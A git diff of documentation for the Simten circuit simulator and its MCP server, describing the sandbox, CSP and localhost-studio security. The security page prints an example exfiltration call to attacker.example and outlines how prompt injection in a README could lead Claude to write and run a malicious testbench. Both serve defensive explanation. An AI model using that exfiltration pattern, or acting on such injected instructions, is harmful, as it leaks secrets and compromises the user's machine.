 When the assistant calls `show_circuit`, the MCP serves a small bundled editor from `localhost` and opens it in your browser automatically. Because the page and its WebSocket share a single localhost origin, there's no "Local Network Access" prompt and it works in every browser (including Safari). You don't need to visit simten.dev.
 
@@ -42,25 +42,25 @@ Once the MCP server is registered, your assistant has access to these tools:
 | Tool | What it does |
 |------|-------------|
 | `get_grammar` | Return the `circuit()` builder API (inputs/outputs, nodes, connect) with worked examples. |
-| `list_components` | Return the full catalog of stdlib components — each with its ports and constructor options (e.g. `Register({ width })`). |
-| `get_verify_api` | Return how to write a `.verify.ts` testbench — the `simulate()` stepper API, `verify.exhaustive`/`verify.check`, `declareOracle`, and worked examples. |
+| `list_components` | Return the full catalog of stdlib components, each with its ports and constructor options (e.g. `Register({ width })`). |
+| `get_verify_api` | Return how to write a `.verify.ts` testbench: the `simulate()` stepper API, `verify.exhaustive`/`verify.check`, `declareOracle`, and worked examples. |
 | `show_circuit` | Push a circuit file to the browser viewer and open a live preview. Watches the file for changes. |
 | `check_circuit` | Validate circuit source (syntax, semantic, type, structural) without running it. |
-| `simulate_circuit` | Compile and simulate; return signal traces and the steady-state cycle. Observation only — shows what the circuit does, not whether it's correct. |
+| `simulate_circuit` | Compile and simulate; return signal traces and the steady-state cycle. Observation only: shows what the circuit does, not whether it's correct. |
 | `verify_circuit` | Run a self-checking `.verify.ts` testbench at a declared oracle tier. This is the correctness gate (see [Verifying circuits](/docs/verifying-circuits)). |
 | `read_waveform` | Query a VCD waveform for specific signals over a cycle window. |
 | `run_on_fpga` | Build and run the circuit on a connected FPGA board. |
 
-`get_grammar`, `list_components`, and `get_verify_api` exist because clients cap an MCP server's instructions *and each tool description* at 2 KB — too small to inline the circuit API, the component catalog, or the testbench-writing guide. The assistant calls these on demand to get the authoritative part names, signatures, and `simulate()` API rather than guessing.
+`get_grammar`, `list_components`, and `get_verify_api` exist because clients cap an MCP server's instructions *and each tool description* at 2 KB, too small to inline the circuit API, the component catalog, or the testbench-writing guide. The assistant calls these on demand to get the authoritative part names, signatures, and `simulate()` API rather than guessing.
 
 ## How the connection works
 
 The MCP server runs locally alongside your assistant and serves two roles:
 
-1. **MCP tool provider** — the assistant calls tools via the standard MCP protocol (stdio transport).
-2. **Local studio** — a single HTTP + WebSocket server on `localhost:19847` serves the bundled viewer *and* hosts the socket the viewer connects back on. The page and the socket share one origin, which is what sidesteps the browser's Local Network Access block.
+1. **MCP tool provider**: the assistant calls tools via the standard MCP protocol (stdio transport).
+2. **Local studio**: a single HTTP + WebSocket server on `localhost:19847` serves the bundled viewer *and* hosts the socket the viewer connects back on. The page and the socket share one origin, which is what sidesteps the browser's Local Network Access block.
 
-When the assistant calls `show_circuit` (or pushes traces / test results), the data flows **one way** to the viewer for display. The viewer sends back only a boolean render acknowledgment — there is no channel for the page to drive the assistant or read host state.
+When the assistant calls `show_circuit` (or pushes traces / test results), the data flows **one way** to the viewer for display. The viewer sends back only a boolean render acknowledgment, and there is no channel for the page to drive the assistant or read host state.
 
 ```
 Assistant (terminal)
@@ -72,11 +72,11 @@ Browser viewer
 
 ### Session & security
 
-- **Loopback only** — the server binds `127.0.0.1`, so it isn't reachable from your network.
-- **Per-process token** — a fresh token each time the MCP starts, handed to the viewer via the URL fragment; connections without it are rejected.
-- **Origin allowlist** — only localhost-origin browser connections are accepted, so a web page you happen to be visiting can't open the socket.
-- **Viewer-only** — the studio accepts nothing actionable from the browser; untrusted page data never reaches a tool result.
-- **Auto-reconnect & cache replay** — the viewer reconnects automatically and receives the most recent pushed circuit on connect; each tab is its own session.
+- **Loopback only**: the server binds `127.0.0.1`, so it isn't reachable from your network.
+- **Per-process token**: a fresh token each time the MCP starts, handed to the viewer via the URL fragment; connections without it are rejected.
+- **Origin allowlist**: only localhost-origin browser connections are accepted, so a web page you happen to be visiting can't open the socket.
+- **Viewer-only**: the studio accepts nothing actionable from the browser; untrusted page data never reaches a tool result.
+- **Auto-reconnect & cache replay**: the viewer reconnects automatically and receives the most recent pushed circuit on connect; each tab is its own session.
 
 ## Example workflow
 
@@ -84,7 +84,7 @@ Browser viewer
 
 **The assistant:**
 1. Writes the circuit: Register + Adder + Constant + HexDisplay
-2. Calls `show_circuit` — the circuit appears in your browser viewer
+2. Calls `show_circuit`, and the circuit appears in your browser viewer
 3. Calls `simulate_circuit` (or `verify_circuit`) to confirm it counts correctly
 4. Replies in the terminal: "I've built a 4-bit counter. Click play to watch it count from 0 to F."
 
@@ -93,7 +93,7 @@ Browser viewer
 **The assistant:**
 1. Edits the circuit file it already wrote
 2. Adds a Switch and Mux for reset logic
-3. Calls `show_circuit` again — the viewer updates live, and you see the reset switch appear
+3. Calls `show_circuit` again, and the viewer updates live, and you see the reset switch appear
 
 ## Running without an assistant
 

--- a/apps/web/content/docs/security.mdx
+++ b/apps/web/content/docs/security.mdx
@@ -5,7 +5,7 @@ description: How Simten isolates untrusted circuit code in both the browser and 
 
 ## Overview
 
-Circuit code is arbitrary TypeScript. When you share a circuit or ask Claude to simulate one, that code executes on your machine. Simten runs it in two separate sandboxes — one for the browser, one for the MCP server — so untrusted code cannot access your credentials, your filesystem, or your app's state.
+Circuit code is arbitrary TypeScript. When you share a circuit or ask Claude to simulate one, that code executes on your machine. Simten runs it in two separate sandboxes (one for the browser, one for the MCP server) so untrusted code cannot access your credentials, your filesystem, or your app's state.
 
 **Core invariant:** In: arbitrary TypeScript string. Out: plain JSON only. No functions, Maps, or class instances cross any boundary. Any dangerous code executes only inside the sandbox, and its results are serialised to safe primitives before leaving.
 
@@ -13,7 +13,7 @@ Circuit code is arbitrary TypeScript. When you share a circuit or ask Claude to 
 
 ## Browser Sandbox
 
-When you type circuit code in the editor, it compiles and simulates inside a hidden `<iframe>` served from a separate origin (`sandbox.simten.dev` in production, `localhost:3002` in development). The main app (`simten.dev` / `localhost:3001`) never executes user code directly — not even via `eval` or `new Function()`.
+When you type circuit code in the editor, it compiles and simulates inside a hidden `<iframe>` served from a separate origin (`sandbox.simten.dev` in production, `localhost:3002` in development). The main app (`simten.dev` / `localhost:3001`) never executes user code directly, not even via `eval` or `new Function()`.
 
 This applies to every code-execution surface: the editor, the live playground, and `<circuit-embed>` web components. All three route through the same sandbox.
 
@@ -21,7 +21,7 @@ This applies to every code-execution surface: the editor, the live playground, a
 
 **Origin isolation (iframe)**
 
-The iframe is served from a different origin. The browser enforces a hard boundary: code inside `sandbox.simten.dev` cannot read `simten.dev` cookies, `localStorage`, auth tokens, or DOM. This is enforced by the browser's same-origin policy at the OS level — not a JavaScript check.
+The iframe is served from a different origin. The browser enforces a hard boundary: code inside `sandbox.simten.dev` cannot read `simten.dev` cookies, `localStorage`, auth tokens, or DOM. This is enforced by the browser's same-origin policy at the OS level, not a JavaScript check.
 
 ```html
 <iframe
@@ -31,19 +31,19 @@ The iframe is served from a different origin. The browser enforces a hard bounda
 />
 ```
 
-`allow-same-origin` is required so the sandbox iframe can load its own scripts (Vite dev server, Cloudflare Pages). It does **not** weaken isolation: the escape hatch only applies when the iframe and parent share the same origin — they don't.
+`allow-same-origin` is required so the sandbox iframe can load its own scripts (Vite dev server, Cloudflare Pages). It does **not** weaken isolation: the escape hatch only applies when the iframe and parent share the same origin, and they don't.
 
 **Thread isolation (Web Worker)**
 
-The iframe spawns a Web Worker for all user code execution. Workers get their own OS thread. An infinite loop (`while(true){}`) blocks only the worker thread — the main app and iframe event loop remain fully responsive.
+The iframe spawns a Web Worker for all user code execution. Workers get their own OS thread. An infinite loop (`while(true){}`) blocks only the worker thread; the main app and iframe event loop remain fully responsive.
 
 ```
 simten.dev (main app)               ← never runs user code
-└── sandbox.simten.dev (iframe — origin boundary)
+└── sandbox.simten.dev (iframe, origin boundary)
     ├── iframe-main thread
     │   └── new Function(evalSource)  ← user lambdas (eval:/onTick:)
-    │       invoked from sim.tick(); not killable — see Known Limitation below
-    └── worker.ts (Web Worker — separate thread)
+    │       invoked from sim.tick(); not killable, see Known Limitation below
+    └── worker.ts (Web Worker, separate thread)
         └── new Function(userCode)    ← compile/simulate
             killable via worker.terminate() on 5s timeout
 ```
@@ -64,14 +64,14 @@ object-src  'none';
 
 The default of `'none'` means every directive must be explicitly opted in. The specific allowances below are the minimum needed for the sandbox to function:
 
-- `script-src 'self'` — the sandbox's own bundle, served same-origin.
-- `script-src 'unsafe-eval'` — `new Function()` is the mechanism that runs compiled user code.
-- `script-src blob:` — the worker loads npm packages via a generated blob-URL ES module.
-- `script-src https://esm.sh` — that blob module's static imports resolve to esm.sh. **Dynamic `import()` is governed by `script-src`, not `connect-src`**, which is why this directive matters: without it, a circuit could exfiltrate data via `import('https://attacker.example/?leak=' + secret)` even though `connect-src` looks restrictive.
-- `connect-src 'self' https://esm.sh` — `fetch`, `XMLHttpRequest`, `WebSocket`, and friends are restricted to the same two destinations.
-- `worker-src 'self'` — the Web Worker can only be constructed from a same-origin URL.
+- `script-src 'self'`: the sandbox's own bundle, served same-origin.
+- `script-src 'unsafe-eval'`: `new Function()` is the mechanism that runs compiled user code.
+- `script-src blob:`: the worker loads npm packages via a generated blob-URL ES module.
+- `script-src https://esm.sh`: that blob module's static imports resolve to esm.sh. **Dynamic `import()` is governed by `script-src`, not `connect-src`**, which is why this directive matters: without it, a circuit could exfiltrate data via `import('https://attacker.example/?leak=' + secret)` even though `connect-src` looks restrictive.
+- `connect-src 'self' https://esm.sh`: `fetch`, `XMLHttpRequest`, `WebSocket`, and friends are restricted to the same two destinations.
+- `worker-src 'self'`: the Web Worker can only be constructed from a same-origin URL.
 
-To close the `import()` exfiltration channel entirely, the worker also **rejects circuit code containing dynamic `import()` expressions at compile time** — the rewriter only handles static `import` statements, and leaving `import()` ungated even with the CSP above is unnecessary risk. Static imports remain fully supported; that covers every legitimate use case (importing fast-check, npm hash libraries as Tier-A oracles, etc.).
+To close the `import()` exfiltration channel entirely, the worker also **rejects circuit code containing dynamic `import()` expressions at compile time**: the rewriter only handles static `import` statements, and leaving `import()` ungated even with the CSP above is unnecessary risk. Static imports remain fully supported; that covers every legitimate use case (importing fast-check, npm hash libraries as Tier-A oracles, etc.).
 
 This CSP is set both in the dev server (`apps/sandbox/vite.config.ts`) and in production (`apps/sandbox/public/_headers`, served by Cloudflare).
 
@@ -89,23 +89,23 @@ The main app never hangs. The sandbox recovers transparently.
 
 The same engine runs in two places **inside the sandbox iframe**: an ephemeral instance in the **Web Worker** during `compile` and headless `simulate`, and a persistent instance on the **iframe's own main thread** that drives the live canvas (`tick`, `setNode`, `snapshot`, `restore`).
 
-**The parent app (`simten.dev`) never executes user code at all** — it lives behind the origin boundary. Everything below is about the split *inside* the sandbox iframe.
+**The parent app (`simten.dev`) never executes user code at all**; it lives behind the origin boundary. Everything below is about the split *inside* the sandbox iframe.
 
-The split between worker and iframe-main is not about one being safer than the other — they share origin and CSP. It's about **runaway recovery**. `worker.terminate()` is the only way out of a `while(true){}` in user code. If the canvas sim shared the worker thread, every bad loop would wipe switch positions, cycle count, and snapshots. Keeping the persistent sim on iframe-main makes a runaway in compile/simulate cost the user 5 seconds and an error toast, not their session.
+The split between worker and iframe-main is not about one being safer than the other; they share origin and CSP. It's about **runaway recovery**. `worker.terminate()` is the only way out of a `while(true){}` in user code. If the canvas sim shared the worker thread, every bad loop would wipe switch positions, cycle count, and snapshots. Keeping the persistent sim on iframe-main makes a runaway in compile/simulate cost the user 5 seconds and an error toast, not their session.
 
-This is structural crash isolation — it falls out of *where* code runs, not from careful error handling. The cost is one extra postMessage hop per tick, well under the frame budget.
+This is structural crash isolation: it falls out of *where* code runs, not from careful error handling. The cost is one extra postMessage hop per tick, well under the frame budget.
 
 ### Known limitation: `eval:` and `onTick:` lambdas
 
-Circuit components can attach user lambdas via `eval:` and `onTick:`. These are reconstructed via `new Function()` on the iframe's main thread (because the persistent sim that invokes them lives there) and called during `sim.tick()`. A pathological lambda — for instance `eval: () => { while(1); }` — can therefore hang the iframe's main thread, *outside* the worker terminate envelope that protects compile/simulate.
+Circuit components can attach user lambdas via `eval:` and `onTick:`. These are reconstructed via `new Function()` on the iframe's main thread (because the persistent sim that invokes them lives there) and called during `sim.tick()`. A pathological lambda (for instance `eval: () => { while(1); }`) can therefore hang the iframe's main thread, *outside* the worker terminate envelope that protects compile/simulate.
 
-The security boundary still holds: the origin boundary blocks access to `simten.dev` cookies/storage, the CSP blocks data egress, and the hung thread has no path to the parent app. The impact is the user's *own* iframe hanging until they refresh — a self-DoS, not a confidentiality or integrity breach. Same risk class as any website running an infinite loop on itself.
+The security boundary still holds: the origin boundary blocks access to `simten.dev` cookies/storage, the CSP blocks data egress, and the hung thread has no path to the parent app. The impact is the user's *own* iframe hanging until they refresh: a self-DoS, not a confidentiality or integrity breach. Same risk class as any website running an infinite loop on itself.
 
-Fully closing this would require moving the persistent sim into the worker so `terminate()` covers eval invocations too. The blocker is canvas-state recovery on terminate (snapshot-before-execute / restore-on-terminate) — tracked as issue #51. See `apps/sandbox/src/main.ts` header for the in-code note.
+Fully closing this would require moving the persistent sim into the worker so `terminate()` covers eval invocations too. The blocker is canvas-state recovery on terminate (snapshot-before-execute / restore-on-terminate), tracked as issue #51. See `apps/sandbox/src/main.ts` header for the in-code note.
 
 ### postMessage boundary
 
-All communication between the main app and the sandbox crosses a `postMessage` boundary using structured-clone-safe data. User lambdas (`eval:`, `onTick:`) cross as **source strings** (`fn.toString()`) and are reconstructed via `new Function()` on the sandbox side — closure variables don't survive the round-trip. The `compile` response returns plain IR (`Circuit[]`, `libraryCircuits`, `evalSources`); the main frame reconstructs the runtime circuit from those parts. The iframe-main hang consequence of this design is covered in the Known Limitation section above.
+All communication between the main app and the sandbox crosses a `postMessage` boundary using structured-clone-safe data. User lambdas (`eval:`, `onTick:`) cross as **source strings** (`fn.toString()`) and are reconstructed via `new Function()` on the sandbox side, so closure variables don't survive the round-trip. The `compile` response returns plain IR (`Circuit[]`, `libraryCircuits`, `evalSources`); the main frame reconstructs the runtime circuit from those parts. The iframe-main hang consequence of this design is covered in the Known Limitation section above.
 
 ### npm imports
 
@@ -124,7 +124,7 @@ When the worker detects import statements, it:
 3. Merges the resolved package values into the scope passed to the circuit executor
 4. Revokes the Blob URL immediately after loading
 
-`@simten/*` imports are silently skipped — those names are already in scope and don't require a network fetch.
+`@simten/*` imports are silently skipped, since those names are already in scope and don't require a network fetch.
 
 This all happens inside the sandbox worker. The main frame never touches the npm packages.
 
@@ -132,26 +132,26 @@ This all happens inside the sandbox worker. The main frame never touches the npm
 
 | Attack | Status |
 |--------|--------|
-| Access `simten.dev` cookies / localStorage | Blocked — origin isolation |
-| Access `simten.dev` DOM | Blocked — origin isolation |
-| `window` object from user code | Blocked — runs in Worker (no `window`) |
-| `localStorage` from user code | Worker code can't reach `localStorage` at all (not defined in Workers); iframe-main eval code sees `sandbox.simten.dev`'s storage, not `simten.dev`'s — origin boundary blocks the cross-origin read |
-| Infinite loop in compile / simulate (worker) | Blocked — Worker on separate OS thread, killed after 5s via `worker.terminate()` |
-| Infinite loop in an `eval:` / `onTick:` lambda (iframe-main) | **Not blocked** — hangs the user's own iframe until they refresh. Self-DoS only; no data egress (CSP holds), no parent-app reach (origin boundary holds). See Known Limitation above. |
-| HTTP requests to arbitrary hosts | Blocked — `connect-src` CSP on sandbox server |
-| Source code exfiltration via `fetch` | Blocked — `connect-src` CSP on sandbox server |
-| `new Function()` in main frame | Blocked — enforced by automated invariant tests (see below) |
+| Access `simten.dev` cookies / localStorage | Blocked: origin isolation |
+| Access `simten.dev` DOM | Blocked: origin isolation |
+| `window` object from user code | Blocked: runs in Worker (no `window`) |
+| `localStorage` from user code | Worker code can't reach `localStorage` at all (not defined in Workers); iframe-main eval code sees `sandbox.simten.dev`'s storage, not `simten.dev`'s; the origin boundary blocks the cross-origin read |
+| Infinite loop in compile / simulate (worker) | Blocked: Worker on separate OS thread, killed after 5s via `worker.terminate()` |
+| Infinite loop in an `eval:` / `onTick:` lambda (iframe-main) | **Not blocked**: hangs the user's own iframe until they refresh. Self-DoS only; no data egress (CSP holds), no parent-app reach (origin boundary holds). See Known Limitation above. |
+| HTTP requests to arbitrary hosts | Blocked: `connect-src` CSP on sandbox server |
+| Source code exfiltration via `fetch` | Blocked: `connect-src` CSP on sandbox server |
+| `new Function()` in main frame | Blocked: enforced by automated invariant tests (see below) |
 
 ---
 
 ## MCP Server: host execution, not a sandbox
 
-When Claude calls `verify_circuit`, `simulate_circuit`, or `check_circuit`, the code runs **on your host with your trust level** — not in an isolated sandbox.
+When Claude calls `verify_circuit`, `simulate_circuit`, or `check_circuit`, the code runs **on your host with your trust level**, not in an isolated sandbox.
 
 - `verify_circuit` spawns your testbench file (`*.verify.ts`) via `tsx` as a subprocess. It inherits your shell environment, has full filesystem access, and can reach the network. This is the same trust level as `npm test`.
 - `simulate_circuit` and `check_circuit` execute in-process inside the MCP server itself. No subprocess boundary.
 
-This is intentional. The MCP server runs alongside your IDE; the testbenches are part of your repo; both are code you wrote (or pasted) and chose to run. Adding a sandbox here would block legitimate use cases — Tier-A oracles that import npm packages, testbenches that read fixture files, captured-data verification — without adding meaningful protection. An attacker who can write to your repo can do worse than what a sandboxed testbench could.
+This is intentional. The MCP server runs alongside your IDE; the testbenches are part of your repo; both are code you wrote (or pasted) and chose to run. Adding a sandbox here would block legitimate use cases (Tier-A oracles that import npm packages, testbenches that read fixture files, captured-data verification) without adding meaningful protection. An attacker who can write to your repo can do worse than what a sandboxed testbench could.
 
 This is the same trust model used by `npm test`, `vitest`, IDE language servers, and most other MCP servers (filesystem, git, postgres, etc.). The norm for "developer tooling that runs your code on your behalf" is no sandbox.
 
@@ -160,24 +160,24 @@ This is the same trust model used by `npm test`, `vitest`, IDE language servers,
 | If you... | Then... |
 |---|---|
 | Write your own testbenches | Same trust as any code in your repo |
-| Paste a `.verify.ts` from a stranger | Treat it like pasting any other `.ts` file from a stranger — it can read your files, hit the network, run arbitrary code |
+| Paste a `.verify.ts` from a stranger | Treat it like pasting any other `.ts` file from a stranger: it can read your files, hit the network, run arbitrary code |
 | Run an MCP tool against a circuit shared by someone else | The *circuit* runs in the browser sandbox documented above. The *testbench* (if you wrote one) runs on your host. |
 
 ### Boundaries that still apply
 
 - **Browser-rendered circuits** continue to execute inside the browser sandbox above. The MCP host-execution model only governs `verify_circuit` and the MCP-side simulate/check entry points.
 - **Per-call timeouts.** Each MCP tool has a per-call timeout (default 30s for verify) so a hung testbench doesn't wedge the session. The subprocess is killed on timeout.
-- **The MCP server itself does not phone home.** No telemetry, no analytics — the network reach a testbench has comes from `tsx` inheriting your environment, not from MCP infrastructure.
+- **The MCP server itself does not phone home.** No telemetry, no analytics; the network reach a testbench has comes from `tsx` inheriting your environment, not from MCP infrastructure.
 
 ### The prompt-injection angle
 
-The one MCP-specific risk worth naming: with `npm test`, *you* invoke it. With MCP, Claude invokes `verify_circuit` on your behalf — and could in principle be socially engineered via prompt injection (a crafted instruction in a README, a circuit shared by another user) into writing a malicious `.verify.ts` and running it.
+The one MCP-specific risk worth naming: with `npm test`, *you* invoke it. With MCP, Claude invokes `verify_circuit` on your behalf, and could in principle be socially engineered via prompt injection (a crafted instruction in a README, a circuit shared by another user) into writing a malicious `.verify.ts` and running it.
 
-This isn't unique to simten — every code-executing MCP tool (filesystem-write + bash, language interpreters, etc.) has the same shape. Mitigation belongs in the layers above the tool: the MCP client confirming tool calls before they run (most do), and the LLM provider's prompt-injection defenses. Sandboxing `verify_circuit` alone wouldn't fix it: a malicious instruction could still drive *other* tools the agent has (Write, Bash) to compromise the host.
+This isn't unique to simten; every code-executing MCP tool (filesystem-write + bash, language interpreters, etc.) has the same shape. Mitigation belongs in the layers above the tool: the MCP client confirming tool calls before they run (most do), and the LLM provider's prompt-injection defenses. Sandboxing `verify_circuit` alone wouldn't fix it: a malicious instruction could still drive *other* tools the agent has (Write, Bash) to compromise the host.
 
 ### If you want stronger isolation
 
-The model above is the default and matches what `npm test` does. If your threat model requires stronger isolation — for example, you're running untrusted testbenches from public sources — the MCP server runs anywhere Node runs. Invoke it inside a Docker container, on a separate user account, or on an isolated dev VM. The tool imposes no sandbox; the OS-level choice is yours.
+The model above is the default and matches what `npm test` does. If your threat model requires stronger isolation (for example, you're running untrusted testbenches from public sources), the MCP server runs anywhere Node runs. Invoke it inside a Docker container, on a separate user account, or on an isolated dev VM. The tool imposes no sandbox; the OS-level choice is yours.
 
 ---
 
@@ -187,12 +187,12 @@ Separate from the host-execution model above (which governs running *your* code)
 
 Because that server is browser-facing, its security rests on four properties:
 
-- **Loopback-only bind.** The HTTP + WebSocket server binds `127.0.0.1`, so it is not reachable from your network or LAN — only processes on your own machine can connect.
+- **Loopback-only bind.** The HTTP + WebSocket server binds `127.0.0.1`, so it is not reachable from your network or LAN; only processes on your own machine can connect.
 - **Per-process token.** Each MCP start mints a fresh random token, delivered to the viewer only via the URL fragment (which the browser never sends to the server in a request, and which is never embedded in served content). A connection whose token doesn't match is closed immediately. The token is not persisted to disk, so a stale tab can't authenticate against a later instance.
-- **Origin allowlist.** A browser WebSocket handshake whose `Origin` isn't `localhost` is refused before the token is even checked — so a cross-site page you happen to visit cannot open a studio socket even if it guesses the port. Non-browser clients (which send no `Origin`) remain token-gated.
+- **Origin allowlist.** A browser WebSocket handshake whose `Origin` isn't `localhost` is refused before the token is even checked, so a cross-site page you happen to visit cannot open a studio socket even if it guesses the port. Non-browser clients (which send no `Origin`) remain token-gated.
 - **Viewer-only inbound surface.** The server accepts exactly two messages from the browser: a session `register`, and a `render-result` that is reduced to a **boolean acknowledgment**. Browser-supplied strings (circuit names, error text) are discarded and never surfaced to a tool result, an MCP notification, or anything an agent reads. The circuit name shown to Claude is derived from the source the *MCP* pushed, not from the browser. This is why the older browser→Claude chat bridge and the `get_circuit_state` read-back were removed: a rendered, possibly-hostile page must not be able to feed a shell-capable agent or read host state.
 
-The served content is just the public editor bundle (no secrets); path requests are traversal-guarded and contained to the bundle directory. The only sensitive data — your circuit source — travels over the token-gated WebSocket, never the static file server. Circuit code rendered in that viewer still executes inside the [browser sandbox](#browser-sandbox), exactly as on the hosted site.
+The served content is just the public editor bundle (no secrets); path requests are traversal-guarded and contained to the bundle directory. The only sensitive data, your circuit source, travels over the token-gated WebSocket, never the static file server. Circuit code rendered in that viewer still executes inside the [browser sandbox](#browser-sandbox), exactly as on the hosted site.
 
 ---
 
@@ -200,7 +200,7 @@ The served content is just the public editor bundle (no secrets); path requests 
 
 To prevent accidental re-introduction of unsafe code execution patterns in the main frame, the test suite includes invariant checks that scan all source files in `apps/web/src` and `packages/embed/src`:
 
-- No `new Function(` calls — the underlying primitive behind all dynamic code execution
-- No imports of `executeCircuitCode` or `executeJsCode` — the core functions that call `new Function()`
+- No `new Function(` calls: the underlying primitive behind all dynamic code execution
+- No imports of `executeCircuitCode` or `executeJsCode`: the core functions that call `new Function()`
 
 These tests run in CI and fail immediately if either pattern appears outside the sandbox worker.

--- a/apps/web/content/docs/simulator-engine.mdx
+++ b/apps/web/content/docs/simulator-engine.mdx
@@ -7,7 +7,7 @@ import { PipelineVisualizer } from '../../src/features/docs/PipelineVisualizer'
 import { PropagationDemo } from '../../src/features/docs/PropagationDemo'
 
 The simulator compiles circuits into a numeric representation and evaluates them using an
-event-driven propagation queue. Watch it in action — source nodes fire first, then changes
+event-driven propagation queue. Watch it in action: source nodes fire first, then changes
 ripple through the circuit:
 
 <PropagationDemo />
@@ -19,63 +19,63 @@ simten makes two architectural choices worth naming explicitly: a hierarchical-t
 dispatch. Both are well-established in production digital logic simulators, though the
 event-driven vs compiled-code choice splits the field.
 
-Circuits are authored as hierarchical TypeScript values — composites containing sub-nodes
+Circuits are authored as hierarchical TypeScript values, composites containing sub-nodes
 and port connections (`Circuit` in `packages/core/src/types/circuit.ts`). Before simulation,
 elaboration (`packages/core/src/simulator/elaboration.ts`) recursively flattens the
 hierarchy; the result is then compiled to a `NumericCircuit`
-(`packages/core/src/simulator/numeric-types.ts`) — typed arrays of port indices, dependency
+(`packages/core/src/simulator/numeric-types.ts`): typed arrays of port indices, dependency
 lists, and an evaluator dispatch table. The flat numeric form is what the hot loop actually
 executes. The split between authoring representation and execution representation lets each
 one specialize: the edit IR maps directly to the user's mental model of a schematic, while
 the runtime IR is built around what's fast on modern CPUs.
 
 **Event-driven vs compiled-code.** simten only re-evaluates gates whose inputs changed since
-the last tick; an event queue propagates the change set until it settles. The alternative —
-used by Verilator — is *compiled-code* style: evaluate every gate every cycle, no queue.
+the last tick; an event queue propagates the change set until it settles. The alternative,
+used by Verilator, is *compiled-code* style: evaluate every gate every cycle, no queue.
 Compiled-code wins on batch verification of a fixed netlist where steady-state throughput
 dominates; event-driven scales better when most of the circuit is stable at any given
 moment, which is the common case during interactive editing. Most commercial event-driven
-simulators (VCS, Questa, Xcelium) sit in the same family as simten — with vastly more
-sophisticated scheduling — and event-driven is the dominant style in commercial EDA for the
+simulators (VCS, Questa, Xcelium) sit in the same family as simten (with vastly more
+sophisticated scheduling), and event-driven is the dominant style in commercial EDA for the
 same workload reason. The choice isn't a quality difference, it's a workload difference.
 
 **Where this pattern comes from.** Event-driven logic simulation goes back to the late
 1960s; the data structures simten uses (integer arrays indexed by node, an event queue, a
 typed dispatch table) are recognizable across the literature, with much of the optimization
-work — levelization, compiled hybrids — developed in the 1980s and 90s and listed below as
+work (levelization, compiled hybrids) developed in the 1980s and 90s and listed below as
 future work. Verilator's docs make the same case for the abstraction-vs-execution split:
 they note that using their abstract SystemC port interface internally everywhere, rather
 than their packed internal representation, "would reduce performance by an order of
-magnitude." That's their version of the same trade — abstract representation for authoring,
-packed integer-indexed representation for execution. The pattern recurs in compilers — V8
-parses JavaScript to an AST, lowers to bytecode, then compiles hot paths to machine code —
-for the same reason: a representation good for humans to author and analyze is poor for
+magnitude." That's their version of the same trade: abstract representation for authoring,
+packed integer-indexed representation for execution. The pattern recurs in compilers. V8
+parses JavaScript to an AST, lowers to bytecode, then compiles hot paths to machine code,
+all for the same reason: a representation good for humans to author and analyze is poor for
 machines to execute fast.
 
 **Optimizations not yet implemented.** Each item below is a known elaboration-time
 optimization with a concrete slot in the existing pipeline; none is required for the current
-target — interactive circuits up to thousands of gates — but each is a viable pickup if
+target (interactive circuits up to thousands of gates), but each is a viable pickup if
 propagation throughput becomes a bottleneck at larger scales.
 
-- **Levelization** — topological sort at elaboration time so events propagate in dependency
+- **Levelization**: topological sort at elaboration time so events propagate in dependency
   order without re-firing. Slots into `elaboration.ts` after flattening; the propagate loop
   walks levels in order rather than draining a queue.
-- **SCC detection for feedback loops** — identify strongly-connected regions during
+- **SCC detection for feedback loops**: identify strongly-connected regions during
   elaboration so fixed-point iteration is isolated to those regions instead of running
   across the whole circuit. Also in `elaboration.ts`.
-- **Constant propagation** — pre-fold nodes whose inputs are all known constants at
+- **Constant propagation**: pre-fold nodes whose inputs are all known constants at
   elaboration time, eliminating their runtime dispatch entirely. New pass adjacent to
   flattening.
-- **Dead-gate elimination** — reachability sweep from outputs at elaboration time, drop
+- **Dead-gate elimination**: reachability sweep from outputs at elaboration time, drop
   unreachable nodes. Pairs naturally with constant propagation.
-- **JIT codegen of straight-line dispatch** — emit one propagate function per circuit via
+- **JIT codegen of straight-line dispatch**: emit one propagate function per circuit via
   `new Function(...)`, replacing the event-queue loop with unrolled gate evaluations. Slots
   into `compile-circuit.ts` as an alternative compilation path. Caveat: `new Function` is
   blocked under strict CSP, so this is deployment-context-dependent.
 
 ## Compilation Pipeline
 
-Click through the tabs to see a FullAdder circuit at each stage — from TypeScript source to typed arrays to running simulation:
+Click through the tabs to see a FullAdder circuit at each stage, from TypeScript source to typed arrays to running simulation:
 
 <PipelineVisualizer />
 
@@ -101,10 +101,10 @@ Output: `FlatCircuit` with `nodes`, `connections`, `hierarchy` (for UI), `topLev
 
 Converts the FlatCircuit into typed arrays for O(1) access in the hot path:
 
-**Step 1 — Node indices**: Assign each node a numeric index (0 to nodeCount-1).
+**Step 1, node indices**: Assign each node a numeric index (0 to nodeCount-1).
 `nodeIdToIndex: Map<string, number>` and `indexToNodeId: string[]`.
 
-**Step 2 — Port indices**: Count total ports, assign contiguous indices.
+**Step 2, port indices**: Count total ports, assign contiguous indices.
 Per-node metadata in typed arrays:
 ```
 nodePortStart:   Uint32Array[nodeIdx]  → first port index for this node
@@ -114,24 +114,24 @@ nodeOutputCount: Uint8Array[nodeIdx]   → number of output ports
 
 Port layout per node: `[input0, input1, ..., output0, output1, ...]` starting at `nodePortStart[nodeIdx]`.
 
-**Step 3 — Port metadata**: For each port, store type information:
+**Step 3, port metadata**: For each port, store type information:
 ```
 portIsOutput: Uint8Array[portIdx]  → 1 if output, 0 if input
 portIsBus:    Uint8Array[portIdx]  → 1 if bus, 0 if bit
 inputPortNames: string[portIdx]    → port name (for evaluator context)
 ```
 
-**Step 4 — Evaluator dispatch**: Map each node to its evaluator function index:
+**Step 4, evaluator dispatch**: Map each node to its evaluator function index:
 ```
 primitiveTypeIndex: Uint8Array[nodeIdx] → index into EVALUATORS table
 ```
 
-**Step 5 — Dependency graph**: Convert string-based dependents to numeric:
+**Step 5, dependency graph**: Convert string-based dependents to numeric:
 ```
 dependents: Uint32Array[]  → dependents[nodeIdx] = array of downstream node indices
 ```
 
-**Step 6 — Input sources**: Pre-compute where each input port reads from:
+**Step 6, input sources**: Pre-compute where each input port reads from:
 ```
 inputSourceNode: Int32Array[portIdx]  → source node index (-1 for top-level)
 inputSourcePort: Int32Array[portIdx]  → source port index into values array
@@ -140,7 +140,7 @@ inputSourcePort: Int32Array[portIdx]  → source port index into values array
 This eliminates all string concatenation and Map lookups from the hot path.
 Reading an input becomes: `values[inputSourcePort[portStart + inputIndex]]`.
 
-**Step 7 — Node classification**:
+**Step 7, node classification**:
